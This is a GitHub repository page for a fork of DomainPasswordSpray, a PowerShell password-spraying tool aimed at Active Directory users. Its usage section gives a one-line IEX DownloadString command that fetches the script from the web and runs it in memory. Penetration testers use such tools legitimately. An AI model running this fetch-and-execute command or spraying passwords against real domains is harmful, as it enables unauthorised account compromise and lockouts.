Skip to content

DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

License

Notifications You must be signed in to change notification settings

notb9/DomainPasswordSpray

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

60 Commits
 
 
 
 
 
 
 
 

Repository files navigation

DomainPasswordSpray - Changes

This is a fork, the original can be found here

The original script threw an error when being IEX-ed. This fork fixes that error.

The script still displays errors when Invoke-DomainPasswordSpray is called, however it does work.

Usage

IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/notb9/DomainPasswordSpray/master/DomainPasswordSpray.ps1")

ToDo

  • Fix the runtime errors

About

DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%